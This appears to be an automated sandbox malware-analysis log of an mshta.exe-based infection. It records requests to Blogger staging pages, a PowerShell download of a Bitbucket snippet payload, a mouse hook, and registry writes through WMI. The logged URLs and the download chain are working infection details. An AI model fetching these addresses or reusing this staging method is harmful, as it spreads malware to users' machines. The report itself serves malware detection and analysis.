Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bitbucket.org
Source: global traffic HTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: ghostbackbone123.blogspot.com
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=1690726786805467605&zx=1fe0aef2-8b4f-4693-89a0-5b335e695da7 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:L3viVeTwYcxGvOqhkZuspYUloSz1Cg:OYEqVJkk_9TWQB1Z
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bitbucket.org
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoola.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: randikhanaekminar.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoolaback.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: backbones1234511a.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ghostbackbone123.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoolaback.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: backbones1234511a.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ghostbackbone123.blogspot.comConnection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49866
Source: mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp String found in binary or memory: "background-position:0 -483px"></span><span class="gb_s">Maps</span></a></li><li class="gb_j gb_k" aria-grabbed="false"><a class="gb_e" data-pid="36" draggable="false" href="https://www.youtube.com/?g equals www.youtube.com (Youtube)
Source: mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp String found in binary or memory: /s.ytimg.com https://i18n-cloud.appspot.com https://www.youtube.com www-onepick-openso equals www.youtube.com (Youtube)
Source: mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp String found in binary or memory: /s.ytimg.com https://i18n-cloud.appspot.com https://www.youtube.com www-onepick-openso.goo equals www.youtube.com (Youtube)
Source: mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.559632238.000001BEE8B06000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.540176025.00000214F0058000.00000004.00000020.sdmp String found in binary or memory: Content-Security-Policy: script-src 'self' *.google.com *.google-analytics.com 'unsafe-inline' 'unsafe-eval' *.gstatic.com *.googlesyndication.com *.blogger.com *.googleapis.com uds.googleusercontent.com https://s.ytimg.com https://i18n-cloud.appspot.com https://www.youtube.com www-onepick-opensocial.googleusercontent.com www-bloggervideo-opensocial.googleusercontent.com www-blogger-opensocial.googleusercontent.com https://www.blogblog.com; report-uri /cspreport equals www.youtube.com (Youtube)
Source: mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.556350637.0000021CF2327000.00000004.00000001.sdmp String found in binary or memory: Content-Security-Policyscript-src 'self' *.google.com *.google-analytics.com 'unsafe-inline' 'unsafe-eval' *.gstatic.com *.googlesyndication.com *.blogger.com *.googleapis.com uds.googleusercontent.com https://s.ytimg.com https://i18n-cloud.appspot.com https://www.youtube.com www-onepick-opensocial.googleusercontent.com www-bloggervideo-opensocial.googleusercontent.com www-blogger-opensocial.googleusercontent.com https://www.blogblog.com; report-uri /cspreport equals www.youtube.com (Youtube)
Source: mshta.exe, 0000001D.00000003.388235434.000001BEEAD1F000.00000004.00000001.sdmp String found in binary or memory: Content-Security-Policyscript-src 'self' *.google.com *.google-analytics.com 'unsafe-inline' 'unsafe-eval' *.gstatic.com *.googlesyndication.com *.blogger.com *.googleapis.com uds.googleusercontent.com https://s.ytimg.com https://i18n-cloud.appspot.com https://www.youtube.com www-onepick-opensocial.googleusercontent.com www-bloggervideo-opensocial.googleusercontent.com www-blogger-opensocial.googleusercontent.com https://www.blogblog.com; report-uri /cspreport} equals www.youtube.com (Youtube)
Source: mshta.exe, 0000001D.00000002.573620913.000001BEEAD3B000.00000004.00000001.sdmp String found in binary or memory: Sensitive content warning b_s">Maps</span></a></li><li class="gb_j gb_k" aria-grabbed="false"><a class="gb_e" data-pid="36" draggable="false" href="https://www.youtube.com/?g equals www.youtube.com (Youtube)
Source: mshta.exe, 0000001D.00000002.573620913.000001BEEAD3B000.00000004.00000001.sdmp String found in binary or memory: b_s">Maps</span></a></li><li class="gb_j gb_k" aria-grabbed="false"><a class="gb_e" data-pid="36" draggable="false" href="https://www.youtube.com/?g equals www.youtube.com (Youtube)
Source: mshta.exe, 00000006.00000003.389899545.0000000006774000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com www-onepick-op equals www.youtube.com (Youtube)
Source: mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com/?gl=GB&tab=j1 equals www.youtube.com (Youtube)
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: pspot.com https://www.youtube.com www-onepick-opensocial.googleusercontent.com www-bloggervideo-opensocial.googleu equals www.youtube.com (Youtube)
Source: unknown HTTPS traffic detected: 67.199.248.15:443 -> 192.168.2.3:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49757 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49758 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.35:443 -> 192.168.2.3:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49774 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49776 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49781 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49783 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49785 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49789 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49790 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49792 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49794 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49799 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49800 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49818 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49828 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49838 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49839 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49844 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49845 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49847 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49848 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49850 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49855 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49856 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49858 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49859 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49861 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49863 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49866 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49871 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49870 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Installs a global mouse hook
Source: C:\Windows\SysWOW64\mshta.exe Windows user hook set: 0 mouse low level C:\Windows\system32\dinput8.dll Jump to behavior

System Summary:

barindex
Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\mshta.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\mshta.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\mshta.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\mshta.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\mshta.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\mshta.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
